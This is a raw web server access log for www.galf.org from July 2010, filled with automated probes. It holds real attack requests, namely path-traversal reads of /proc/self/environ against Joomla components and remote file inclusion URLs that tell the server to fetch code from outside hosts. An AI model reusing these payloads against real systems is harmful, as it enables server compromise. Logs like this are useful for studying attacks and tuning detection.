195.56.111.226 - - [25/Jul/2010:18:45:43 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:45:53 -0700] "GET /logs/access_100510.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:45:53 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:45:54 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:46:27 -0700] "GET /logs/access_090921.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:47:04 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:47:04 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:47:05 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:47:05 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:47:05 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:47:06 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:47:18 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:47:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:47:19 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:47:30 -0700] "GET /logs/access_091026.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:47:46 -0700] "GET /logs/access_090914.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:47:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:47:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:47:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:48:04 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:48:04 -0700] "GET /logs/access_091116.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:48:04 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
80.249.166.63 - - [25/Jul/2010:18:48:28 -0700] "POST /config.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
80.249.166.63 - - [25/Jul/2010:18:48:28 -0700] "POST /logs/config.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
80.249.166.63 - - [25/Jul/2010:18:48:29 -0700] "POST /logs/access.log/config.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.42.216.165 - - [25/Jul/2010:18:48:29 -0700] "GET /logs/access_091207.logshow_news.php?cutepath=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
93.42.216.165 - - [25/Jul/2010:18:48:30 -0700] "GET /show_news.php?cutepath=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
93.42.216.165 - - [25/Jul/2010:18:48:30 -0700] "GET /logs/show_news.php?cutepath=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:48:32 -0700] "GET /logs/access_100301.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:48:32 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:48:32 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:48:40 -0700] "GET /logs/access_100628.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:48:42 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:48:42 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:48:42 -0700] "GET /logs/access_100301.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:48:59 -0700] "GET /logs/access_100628.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:18:49:12 -0700] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
86.109.96.188 - - [25/Jul/2010:18:49:12 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
86.109.96.188 - - [25/Jul/2010:18:49:12 -0700] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "galf.org"
94.124.120.23 - - [25/Jul/2010:18:49:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
94.124.120.23 - - [25/Jul/2010:18:49:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
94.124.120.23 - - [25/Jul/2010:18:49:16 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
94.124.120.23 - - [25/Jul/2010:18:49:32 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
94.124.120.23 - - [25/Jul/2010:18:49:32 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
94.124.120.23 - - [25/Jul/2010:18:49:32 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:49:32 -0700] "GET /logs/access_100301.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:49:42 -0700] "GET /logs/access_100628.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:50:59 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:50:59 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:50:59 -0700] "POST /logs/access_090928.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:50:59 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:50:59 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:00 -0700] "POST /logs/access_090928.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:00 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:00 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:00 -0700] "POST /logs/access_090928.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:00 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:00 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:00 -0700] "POST /logs/access_090928.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:00 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:00 -0700] "POST /logs/access_090928.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:00 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:00 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:01 -0700] "POST /logs/access_090928.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:01 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:01 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:01 -0700] "POST /logs/access_090928.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:51:01 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:51:18 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:51:18 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:51:37 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:51:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:51:37 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:18:51:58 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:52:11 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:18:52:13 -0700] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:18:52:13 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:18:52:13 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:18:52:14 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:18:52:14 -0700] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:18:52:14 -0700] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:18:52:14 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:18:52:14 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [25/Jul/2010:18:52:14 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:52:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:52:24 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:52:24 -0700] "GET /logs/access_091228.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:52:24 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:52:24 -0700] "GET /logs/access_091102.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:52:34 -0700] "POST /logs/access_100329.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:52:34 -0700] "POST /logs/access_100329.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:52:35 -0700] "POST /logs/access_100329.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:52:35 -0700] "POST /logs/access_100329.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:52:35 -0700] "POST /logs/access_100329.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:52:35 -0700] "POST /logs/access_100329.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
188.40.34.169 - - [25/Jul/2010:18:52:35 -0700] "POST /logs/access_100329.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:52:45 -0700] "GET /logs/access_091102.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:52:45 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:52:46 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:52:49 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:18:52:54 -0700] "GET /logs/access_100510.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:18:53:42 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:18:53:42 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:18:54:26 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:18:54:27 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
78.41.233.128 - - [25/Jul/2010:18:54:35 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
78.41.233.128 - - [25/Jul/2010:18:54:35 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
93.158.144.27 - - [25/Jul/2010:18:54:56 -0700] "GET /logs/access_100524.log HTTP/1.1" 200 9085671 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:55:51 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:55:51 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:55:52 -0700] "GET /logs/access_091102.log%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.67.73 - - [25/Jul/2010:18:55:58 -0700] "GET /logs/access_100510.log%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:57:50 -0700] "GET /logs/access_100628.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:57:56 -0700] "GET /logs/access_100628.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:18:57:57 -0700] "GET /logs/access_100628.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:58:46 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:58:47 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:58:51 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
94.199.178.17 - - [25/Jul/2010:18:58:51 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.joodsmaastricht.nl/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:18:58:58 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:18:58:59 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
78.41.233.128 - - [25/Jul/2010:18:59:14 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
78.41.233.128 - - [25/Jul/2010:18:59:14 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:18:59:21 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:18:59:21 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:19:00:29 -0700] "GET /logs/access_100628.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:19:03:33 -0700] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:19:03:33 -0700] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.195.115.245 - - [25/Jul/2010:19:03:43 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
89.200.170.85 - - [25/Jul/2010:19:03:45 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
89.200.170.85 - - [25/Jul/2010:19:03:45 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
89.200.170.85 - - [25/Jul/2010:19:03:45 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
